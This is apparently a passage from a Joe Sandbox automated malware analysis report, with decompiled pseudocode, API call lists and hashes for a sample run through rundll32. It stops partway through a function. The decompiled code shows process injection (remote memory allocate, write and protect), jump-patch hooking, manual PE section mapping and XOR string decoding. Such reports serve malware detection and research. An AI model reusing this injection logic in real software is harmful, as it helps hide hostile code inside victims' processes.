                                                                      							NtProtectVirtualMemory( *_t77,  &_v32,  &_v8, _v20,  &_v28);
                                                                      						} else {
                                                                      							_t80 = 0;
                                                                      						}
                                                                      						goto L13;
                                                                      					}
                                                                      					_v16 = 0xe9;
                                                                      					_t70 = 5;
                                                                      					_v15 = _t49 - _t73 - _t70;
                                                                      					goto L11;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • GetThreadContext.KERNELBASE(?,00010002), ref: 041BA8A6
                                                                      • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000004,00000000), ref: 041BA901
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,00000002,00000008,00000001), ref: 041BA91A
                                                                        • Part of subcall function 041BA222: LoadLibraryW.KERNEL32(00000000), ref: 041BA2F2
                                                                      • NtProtectVirtualMemory.NTDLL(?,?,00000001,00000000,00000000), ref: 041BA949
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$Protect$ContextLibraryLoadThreadWrite
                                                                      • String ID:
                                                                      • API String ID: 2853935321-0
                                                                      • Opcode ID: 358fb848aecf18e5932688b2d6b2bbf387d272edaf180871e5725c029aed5de7
                                                                      • Instruction ID: b901ac2e804668ee11857cfbd652198dd4c4e42b5b5d7cef365e6014daab9ff3
                                                                      • Opcode Fuzzy Hash: 358fb848aecf18e5932688b2d6b2bbf387d272edaf180871e5725c029aed5de7
                                                                      • Instruction Fuzzy Hash: 154150B1A01219AFDB10DF95D984BEEB7B8FF08394F108165E584D7150E734AE44DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 169 41b1015-41b1025 170 41b102b-41b1066 call 41b910a call 41b94e5 call 41c4357 call 41b90ea GetFileAttributesW 169->170 171 41b1139-41b113d 169->171 185 41b1068-41b106e call 41b9d66 170->185 186 41b1076-41b1082 call 41b9d66 170->186 172 41b113f-41b114f 171->172 173 41b1132 171->173 180 41b106f-41b1071 172->180 176 41b1134-41b1136 173->176 180->176 185->180 191 41b1084-41b10e3 memset * 2 MultiByteToWideChar 186->191 191->191 192 41b10e5-41b110f call 41b9491 GetPEB 191->192 195 41b1111-41b1113 192->195 196 41b1130-41b1131 192->196 197 41b1118-41b1122 195->197 196->173 197->197 198 41b1124-41b112e 197->198 198->196 198->198
                                                                      C-Code - Quality: 93%
                                                                      			_entry_(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                      				void _v257;
                                                                      				char _v258;
                                                                      				char _v260;
                                                                      				short _v772;
                                                                      				intOrPtr _t21;
                                                                      				WCHAR* _t28;
                                                                      				long _t29;
                                                                      				char _t32;
                                                                      				char _t33;
                                                                      				int _t44;
                                                                      				void* _t48;
                                                                      				void* _t58;
                                                                      				int _t61;
                                                                      				intOrPtr* _t63;
                                                                      
                                                                      				_t48 = __ecx;
                                                                      				if(_a8 != 1) {
                                                                      					if(_a8 != 0) {
                                                                      						L11:
                                                                      						return 1;
                                                                      					}
                                                                      					_t21 =  *0x41d0fa0; // 0x439f8a0
                                                                      					 *((intOrPtr*)(_t21 + 0xbc))(0xaa);
                                                                      					L3:
                                                                      					return 0;
                                                                      				}
                                                                      				E041B910A();
                                                                      				E041B94E5();
                                                                      				 *0x41d0fa8 = _a4;
                                                                      				 *0x41d0fa4 = 1;
                                                                      				E041C4357(_a4);
                                                                      				 *_t63 = 0x14c; // executed
                                                                      				_t28 = E041B90EA(_t48); // executed
                                                                      				_a8 = _t28;
                                                                      				_t29 = GetFileAttributesW(_t28); // executed
                                                                      				if(_t29 == 0xffffffff) {
                                                                      					E041B9D66( &_a8);
                                                                      					_t58 = 0x14;
                                                                      					_t61 = 0;
                                                                      					do {
                                                                      						_t32 =  *0x41cd868; // 0x6665
                                                                      						_v260 = _t32;
                                                                      						_t33 =  *0x41cd86a; // 0x0
                                                                      						_v258 = _t33;
                                                                      						memset( &_v257, 0, 0xfd);
                                                                      						memset( &_v772, 0, 0x200);
                                                                      						_t63 = _t63 + 0x18;
                                                                      						MultiByteToWideChar(0, 0,  &_v260, 0xffffffff,  &_v772, 0xff);
                                                                      						_t58 = _t58 - 1;
                                                                      					} while (_t58 != 0);
                                                                      					 *0x41d0fa0 = E041B9491(0x144, 0x26e);
                                                                      					_a8 =  *[fs:0x30];
                                                                      					if(_a8[1] == 0) {
                                                                      						L10:
                                                                      						goto L11;
                                                                      					}
                                                                      					_t44 = 0;
                                                                      					do {
                                                                      						 *(_t44 + 0x41cf820) =  *(_t44 + 0x41cf820) ^ 0x00000009;
                                                                      						_t44 = _t44 + 1;
                                                                      					} while (_t44 < 0x80);
                                                                      					do {
                                                                      						 *(_t61 + 0x41cf050) =  *(_t61 + 0x41cf050) ^ 0x000000aa;
                                                                      						_t61 = _t61 + 1;
                                                                      					} while (_t61 < 0x80);
                                                                      					goto L10;
                                                                      				}
                                                                      				E041B9D66( &_a8);
                                                                      				goto L3;
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 041B910A: HeapCreate.KERNELBASE(00000000,00096000,00000000,041B1030), ref: 041B9113
                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 041B105A
                                                                      • memset.MSVCRT ref: 041B10A9
                                                                      • memset.MSVCRT ref: 041B10BB
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 041B10DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: memset$AttributesByteCharCreateFileHeapMultiWide
                                                                      • String ID:
                                                                      • API String ID: 371002992-0
                                                                      • Opcode ID: 62722ba75b73aac183de42a156731e3110b24ffe862b11310bb059d17408fdbe
                                                                      • Instruction ID: 46468d54816308413a10b200d4234f0e6c43197c005a0309dd38b357c65bbf13
                                                                      • Opcode Fuzzy Hash: 62722ba75b73aac183de42a156731e3110b24ffe862b11310bb059d17408fdbe
                                                                      • Instruction Fuzzy Hash: FC314771501214BFE7209F79DCC8BDA3BACEB09364F118169F598CB1C1D734A981CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 199 41bca0f-41bca42 NtAllocateVirtualMemory 200 41bca8d 199->200 201 41bca44-41bca55 NtWriteVirtualMemory 199->201 204 41bca8f-41bca93 200->204 202 41bca57-41bca6f NtProtectVirtualMemory 201->202 203 41bca76-41bca7a 201->203 202->203 205 41bca71-41bca74 202->205 203->200 206 41bca7c-41bca8a NtFreeVirtualMemory 203->206 205->204 206->200
                                                                      C-Code - Quality: 100%
                                                                      			E041BCA0F(void* __ecx, void* __edx, void* _a4, long _a8, long _a12) {
                                                                      				void* _v8;
                                                                      				long _v12;
                                                                      				long _v16;
                                                                      				long _t25;
                                                                      				long _t37;
                                                                      				void* _t41;
                                                                      				void* _t42;
                                                                      
                                                                      				_t37 = _a8;
                                                                      				_t41 = __ecx;
                                                                      				_a8 = _t37;
                                                                      				_t42 = __edx;
                                                                      				_v8 = 0;
                                                                      				_v16 = 0;
                                                                      				_v12 = 0;
                                                                      				_t25 = NtAllocateVirtualMemory(__edx,  &_v8, 0,  &_a8, 0x3000, 4); // executed
                                                                      				if(_t25 < 0) {
                                                                      					L6:
                                                                      					return 0;
                                                                      				}
                                                                      				if(NtWriteVirtualMemory(_t42, _v8, _a4, _t37,  &_v12) < 0) {
                                                                      					L4:
                                                                      					if(_v8 != 0) {
                                                                      						 *((intOrPtr*)(_t41 + 4))(_t42,  &_v8,  &_a8, 0x8000);
                                                                      					}
                                                                      					goto L6;
                                                                      				}
                                                                      				_a8 = _t37;
                                                                      				if(NtProtectVirtualMemory(_t42,  &_v8,  &_a8, _a12,  &_v16) < 0) {
                                                                      					goto L4;
                                                                      				}
                                                                      				return _v8;
                                                                      			}

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 041BCA3E
                                                                      • NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 041BCA50
                                                                      • NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 041BCA6A
                                                                      • NtFreeVirtualMemory.NTDLL(?,00000000,00000000,00008000), ref: 041BCA8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$AllocateFreeProtectWrite
                                                                      • String ID:
                                                                      • API String ID: 727285278-0
                                                                      • Opcode ID: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
                                                                      • Instruction ID: da29e032329acf8ed7e0a7c10e798ba00e2674488c7a20824a4819e19a2c7d1c
                                                                      • Opcode Fuzzy Hash: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
                                                                      • Instruction Fuzzy Hash: 0C11B676A00109BFDB15CFA5C984EDEBBBCEF08754F10816AFA19D6140E730EB049BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 207 41c43f4-41c4402 208 41c440c-41c4437 207->208 209 41c4404-41c4407 207->209 211 41c443b-41c443d 208->211 210 41c4644-41c4645 209->210 212 41c443f 211->212 213 41c4441-41c447b NtProtectVirtualMemory 211->213 212->211 214 41c447d-41c447f 213->214 215 41c448b-41c448f 213->215 216 41c4481 214->216 217 41c4483-41c4486 214->217 218 41c4498-41c44a2 215->218 216->214 217->210 219 41c44a8-41c44b4 218->219 220 41c4642 218->220 221 41c44b8-41c4513 call 41b92a2 call 41b9202 219->221 222 41c44b6 219->222 220->210 228 41c4564-41c456b 221->228 229 41c4515-41c451c 221->229 222->218 230 41c45fa-41c45fc 228->230 231 41c451e-41c4525 229->231 232 41c4570-41c4585 229->232 237 41c45fe 230->237 238 41c4600-41c462d NtProtectVirtualMemory 230->238 235 41c45cf-41c45d6 231->235 236 41c452b-41c4532 231->236 233 41c45cd 232->233 234 41c4587-41c4594 232->234 233->230 234->233 239 41c4596-41c45a4 234->239 235->230 240 41c45d8-41c45df 236->240 241 41c4538-41c453f 236->241 237->230 242 41c462f-41c4631 238->242 243 41c4637-41c4639 238->243 239->233 246 41c45a6-41c45b4 239->246 240->230 249 41c4545-41c454c 241->249 250 41c45e1-41c45e8 241->250 244 41c4635 242->244 245 41c4633 242->245 247 41c463d 243->247 248 41c463b 243->248 244->247 245->242 246->233 251 41c45b6-41c45c4 246->251 247->220 248->243 252 41c45ea-41c45f1 249->252 253 41c4552-41c4559 249->253 250->230 251->233 254 41c45c6 251->254 252->230 255 41c455f 253->255 256 41c45f3 253->256 254->233 255->230 256->230
                                                                      C-Code - Quality: 65%
                                                                      			E041C43F4(signed int __eax, void* _a4, void* _a8, intOrPtr _a12, void* _a16) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				intOrPtr _v20;
                                                                      				long _v24;
                                                                      				long _v28;
                                                                      				intOrPtr _v32;
                                                                      				long _v36;
                                                                      				intOrPtr _v40;
                                                                      				long _v44;
                                                                      				void* _v48;
                                                                      				intOrPtr _v52;
                                                                      				signed int _v56;
                                                                      				void* _v60;
                                                                      				signed int _v64;
                                                                      				char _v76;
                                                                      				void* _t180;
                                                                      				void* _t181;
                                                                      
                                                                      				_v64 = _v64 & 0x00000000;
                                                                      				if(_a12 == 0) {
                                                                      					return __eax | 0xffffffff;
                                                                      				}
                                                                      				_v32 = _a12;
                                                                      				_v40 =  *((intOrPtr*)(_a12 + 0x3c)) + _a12;
                                                                      				_v52 = _v40;
                                                                      				_t16 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8; // 0xf8
                                                                      				_v20 = _a12 + _t16;
                                                                      				_v36 = _v36 & 0x00000000;
                                                                      				do {
                                                                      				} while (0 != 0);
                                                                      				_v44 = 4;
                                                                      				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8;
                                                                      				_v48 = _a16;
                                                                      				_v28 = NtProtectVirtualMemory(_a8,  &_v48,  &_v24, _v44,  &_v36);
                                                                      				if(_v28 >= 0) {
                                                                      					_v12 = _v12 & 0x00000000;
                                                                      					while(_v12 < ( *(_v52 + 6) & 0x0000ffff)) {
                                                                      						if( *((intOrPtr*)(_v20 + 0x14 + _v12 * 0x28)) != 0) {
                                                                      							E041B92A2( &_v76, 0, 9);
                                                                      							E041B9202( &_v76, _v12 * 0x28 + _v20, 8);
                                                                      							_t181 = _t181 + 0x18;
                                                                      							_v60 = _a16 +  *((intOrPtr*)(_v20 + 0xc + _v12 * 0x28));
                                                                      							_v8 = _v8 & 0x00000000;
                                                                      							_v56 =  *(_v20 + 0x24 + _v12 * 0x28) & 0xf0000000;
                                                                      							_v16 = _v56;
                                                                      							if(_v16 == 0x20000000) {
                                                                      								_v8 = 0x10;
                                                                      							} else {
                                                                      								if(_v16 == 0x40000000) {
                                                                      									_v8 = 2;
                                                                      									if( *((char*)(_t180 + 0xbadb65)) == 0x72 &&  *((char*)(_t180 + 0xbadb65)) == 0x64 &&  *((char*)(_t180 + 0xffffffffffffffbb)) == 0x61 &&  *((char*)(_t180 + 0xbadb65)) == 0x74 &&  *((char*)(_t180 + 0xffffffffffffffbd)) == 0x61) {
                                                                      										_v8 = 4;
                                                                      									}
                                                                      								} else {
                                                                      									if(_v16 == 0x60000000) {
                                                                      										_v8 = 0x20;
                                                                      									} else {
                                                                      										if(_v16 == 0x80000000) {
                                                                      											_v8 = 4;
                                                                      										} else {
                                                                      											if(_v16 == 0xa0000000) {
                                                                      												_v8 = 0x40;
                                                                      											} else {
                                                                      												if(_v16 == 0xc0000000) {
                                                                      													_v8 = 4;
                                                                      												} else {
                                                                      													if(_v16 == 0xe0000000) {
                                                                      														_v8 = 0x40;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							_v24 =  *((intOrPtr*)(_v20 + 0x10 + _v12 * 0x28));
                                                                      							_v28 = NtProtectVirtualMemory(_a8,  &_v60,  &_v24, _v8,  &_v36);
                                                                      							if(_v28 >= 0) {
                                                                      								while(0 != 0) {
                                                                      								}
                                                                      								L43:
                                                                      								L10:
                                                                      								_v12 = _v12 + 1;
                                                                      								continue;
                                                                      							}
                                                                      							while(0 != 0) {
                                                                      							}
                                                                      							goto L43;
                                                                      						}
                                                                      						goto L10;
                                                                      					}
                                                                      					return 0;
                                                                      				}
                                                                      				L6:
                                                                      				if(0 == 0) {
                                                                      					return 0xffffffff;
                                                                      				} else {
                                                                      				}
                                                                      				goto L6;
                                                                      			}


                                                                      APIs
                                                                      • NtProtectVirtualMemory.NTDLL(041B43D8,?,?,00000004,00000000), ref: 041C4471
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProtectVirtual
                                                                      • String ID: @
                                                                      • API String ID: 2706961497-2766056989
                                                                      • Opcode ID: 5d6acb65a0b66dfe4f450ea08b61fb6c7ae1f8b855b602cec30e187115862d90
                                                                      • Instruction ID: a0e441e9c8b8e1bb3b383022393305eaf5fa0cc5c26365db8181f8bf3324ca1d
                                                                      • Opcode Fuzzy Hash: 5d6acb65a0b66dfe4f450ea08b61fb6c7ae1f8b855b602cec30e187115862d90
                                                                      • Instruction Fuzzy Hash: 897119B4D08259DBDF14CFA8C9E4BEDBBB4AB14309F1085AAD811E6280D374EA81DF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 279 41bc71c-41bc744 CreateToolhelp32Snapshot 280 41bc74a-41bc773 call 41b92a2 Process32First 279->280 281 41bc7e0-41bc7e6 279->281 284 41bc783-41bc791 call 41b911f 280->284 285 41bc775-41bc781 280->285 289 41bc792-41bc79b 284->289 285->281 289->289 290 41bc79d-41bc7aa call 41b913b 289->290 293 41bc7ab-41bc7bb call 41bb48b 290->293 295 41bc7bd-41bc7ce 293->295 296 41bc7d0-41bc7dd FindCloseChangeNotification 293->296 295->293 295->296 296->281
                                                                      C-Code - Quality: 78%
                                                                      			E041BC71C(void* __ecx, void* __edx) {
                                                                      				void* _v304;
                                                                      				char _v308;
                                                                      				intOrPtr _v312;
                                                                      				char _v316;
                                                                      				signed int _t20;
                                                                      				signed int _t21;
                                                                      				char _t27;
                                                                      				intOrPtr _t37;
                                                                      				void* _t40;
                                                                      				intOrPtr _t49;
                                                                      				void* _t51;
                                                                      				void* _t55;
                                                                      				void* _t57;
                                                                      
                                                                      				_t40 = __edx;
                                                                      				_v304 = __ecx;
                                                                      				_t20 = CreateToolhelp32Snapshot(2, 0);
                                                                      				_t57 = _t20;
                                                                      				_t21 = _t20 | 0xffffffff;
                                                                      				if(_t57 != _t21) {
                                                                      					E041B92A2( &_v304, 0, 0x128);
                                                                      					_v304 = 0x128;
                                                                      					if(Process32First(_t57,  &_v304) != 0) {
                                                                      						_t27 = E041B911F(0x20);
                                                                      						_v316 = _t27;
                                                                      						_t51 = 0x1f;
                                                                      						do {
                                                                      							_t9 = _t51 + 0x63; // 0x82
                                                                      							 *((char*)(_t51 + _t27)) = _t9;
                                                                      							_t51 = _t51 - 1;
                                                                      						} while (_t51 >= 0);
                                                                      						E041B913B( &_v316, 0);
                                                                      						while(1) {
                                                                      							_t55 = _v312( &_v308, _t40);
                                                                      							if(_t55 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t49 =  *0x41d0fa0; // 0x439f8a0
                                                                      							_push( &_v308);
                                                                      							_push(_t57);
                                                                      							if( *((intOrPtr*)(_t49 + 0x48))() != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						FindCloseChangeNotification(_t57);
                                                                      						_t21 = 0 | _t55 == 0x00000000;
                                                                      					} else {
                                                                      						_t37 =  *0x41d0fa0; // 0x439f8a0
                                                                      						 *((intOrPtr*)(_t37 + 0x34))(_t57);
                                                                      						_t21 = 0xfffffffe;
                                                                      					}
                                                                      				}
                                                                      				return _t21;
                                                                      			}


                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 041BC73A
                                                                        • Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4
                                                                      • Process32First.KERNEL32(00000000,?), ref: 041BC76E
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 041BC7D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
                                                                      • String ID:
                                                                      • API String ID: 3344077921-0
                                                                      • Opcode ID: 62475acab9748a3519ac8ab0738a06bb624235418de50f60bf5b42c8143fd9c0
                                                                      • Instruction ID: b1799ec0c8d0757793b0607eee0273ffee7097d9285e3b941ae8a04ced4007f5
                                                                      • Opcode Fuzzy Hash: 62475acab9748a3519ac8ab0738a06bb624235418de50f60bf5b42c8143fd9c0
                                                                      • Instruction Fuzzy Hash: FB21C4B36052016FD310DE69D889EDB7BA8EF89360F14055DF690C7181EB24E945C7D1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E041BA412(void* __ecx, void* __edx) {
                                                                      				void* _v8;
                                                                      				void* _v12;
                                                                      				long _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				long _v32;
                                                                      				long _t37;
                                                                      				void* _t38;
                                                                      				intOrPtr _t39;
                                                                      				intOrPtr _t42;
                                                                      				intOrPtr _t43;
                                                                      				void* _t46;
                                                                      				void* _t58;
                                                                      				void* _t71;
                                                                      				intOrPtr* _t73;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t71 = __edx;
                                                                      				_t58 = __ecx;
                                                                      				_t3 = _t71 + 0x3c; // 0x100
                                                                      				_t73 =  *_t3 + __edx;
                                                                      				if( *_t73 != 0x4550) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				}
                                                                      				_v16 =  *(_t73 + 0x50);
                                                                      				_t37 = NtAllocateVirtualMemory(__ecx,  &_v8, 0,  &_v16, 0x3000, 0x40); // executed
                                                                      				if(_t37 < 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				_t38 = E041B918A( *0x41d0fd8, 0x1ac4);
                                                                      				_v12 = _t38;
                                                                      				if(_t38 == 0) {
                                                                      					goto L5;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t38 + 0x224)) = _v8;
                                                                      				_t39 = E041BCA0F( *0x41d10b0, _t58, _t38, 0x1ac4, 4); // executed
                                                                      				_v20 = _t39;
                                                                      				_push(0x1ac4);
                                                                      				_push( &_v12);
                                                                      				if(_t39 != 0) {
                                                                      					E041B913B();
                                                                      					_t42 =  *0x41d0fa8; // 0x41b0000
                                                                      					_v24 = _t42;
                                                                      					_t43 =  *0x41d0fd8; // 0x439fc50
                                                                      					_v28 = _t43;
                                                                      					 *0x41d0fa8 = _v8;
                                                                      					 *0x41d0fd8 = _v20;
                                                                      					_t46 = E041B918A(_t71,  *(_t73 + 0x50)); // executed
                                                                      					_v12 = _t46;
                                                                      					if(_t46 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					E041BA391(_t46, _v8, _t71);
                                                                      					_v32 = _v32 & 0x00000000;
                                                                      					 *0x41d0fa8 = _v24;
                                                                      					 *0x41d0fd8 = _v28;
                                                                      					if(NtWriteVirtualMemory(_t58, _v8, _v12,  *(_t73 + 0x50),  &_v32) < 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					E041C43F4(_t52,  *0x41d10b0, _t58, _t71, _v8); // executed
                                                                      					E041B913B( &_v12, 0);
                                                                      					return _v8;
                                                                      				}
                                                                      				E041B913B();
                                                                      				goto L5;
                                                                      			}




















                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(041B43D8,00000000,00000000,?,00003000,00000040,?,00000000,041B43D8), ref: 041BA44D
                                                                      • NtWriteVirtualMemory.NTDLL(041B43D8,00000000,?,?,00000000), ref: 041BA516
                                                                        • Part of subcall function 041BCA0F: NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 041BCA3E
                                                                        • Part of subcall function 041BCA0F: NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 041BCA50
                                                                        • Part of subcall function 041BCA0F: NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 041BCA6A
                                                                        • Part of subcall function 041B913B: HeapFree.KERNEL32(00000000,00000000), ref: 041B9181
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$AllocateWrite$FreeHeapProtect
                                                                      • String ID:
                                                                      • API String ID: 4171237596-0
                                                                      • Opcode ID: 52b6abc1c05094abb552964447140468c0b7c9301b4aefe578f72682ba975928
                                                                      • Instruction ID: e4028fb1cf8f5032040b64cdbfe57640ded9790aec422463e08ed0d48487a4df
                                                                      • Opcode Fuzzy Hash: 52b6abc1c05094abb552964447140468c0b7c9301b4aefe578f72682ba975928
                                                                      • Instruction Fuzzy Hash: 574162B1A01205BFEB00DFA5DD94AEE7BF8FF48354F244469E640E7280E774AE419B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 95 41ba664-41ba68d call 41bce25 98 41ba68f-41ba691 95->98 99 41ba693-41ba695 95->99 100 41ba697 98->100 99->100 101 41ba6a5-41ba6be lstrlenW call 41ba543 99->101 102 41ba699-41ba6a3 100->102 105 41ba6c0-41ba6d0 call 41bce25 101->105 106 41ba6f5-41ba6fd 101->106 102->101 102->102 114 41ba6d8-41ba6e2 105->114 115 41ba6d2-41ba6d6 105->115 108 41ba703-41ba706 106->108 109 41ba7e7-41ba7f5 call 41b913b 106->109 112 41ba70c-41ba70f 108->112 113 41ba7d5-41ba7e5 call 41b913b 108->113 121 41ba7f6-41ba7fa 109->121 118 41ba716-41ba718 112->118 113->109 114->114 119 41ba6e4-41ba6f0 lstrlenW 114->119 115->114 115->119 122 41ba71e-41ba73c call 41b92a2 118->122 123 41ba7c0-41ba7cf 118->123 119->121 126 41ba748-41ba758 call 41bca94 122->126 127 41ba73e-41ba743 call 41be15a 122->127 123->108 123->113 131 41ba75a-41ba771 call 41ba823 126->131 132 41ba782-41ba785 126->132 127->126 131->132 139 41ba773-41ba776 call 41ba952 131->139 134 41ba7b0-41ba7ba 132->134 135 41ba787-41ba789 132->135 134->118 134->123 137 41ba78b-41ba791 135->137 138 41ba79a-41ba7aa 135->138 137->138 138->134 142 41ba77b-41ba77d 139->142 142->132 143 41ba77f-41ba781 142->143 143->132
                                                                      C-Code - Quality: 100%
                                                                      			E041BA664(WCHAR* __edx) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				WCHAR* _v24;
                                                                      				char _v28;
                                                                      				char _v29;
                                                                      				intOrPtr _v40;
                                                                      				short _v44;
                                                                      				void* __ebx;
                                                                      				signed int _t48;
                                                                      				signed int _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed int _t62;
                                                                      				intOrPtr _t64;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t69;
                                                                      				signed int _t71;
                                                                      				signed int _t72;
                                                                      				signed int _t74;
                                                                      				char _t80;
                                                                      				char _t94;
                                                                      				signed int _t96;
                                                                      				char _t97;
                                                                      				signed int _t98;
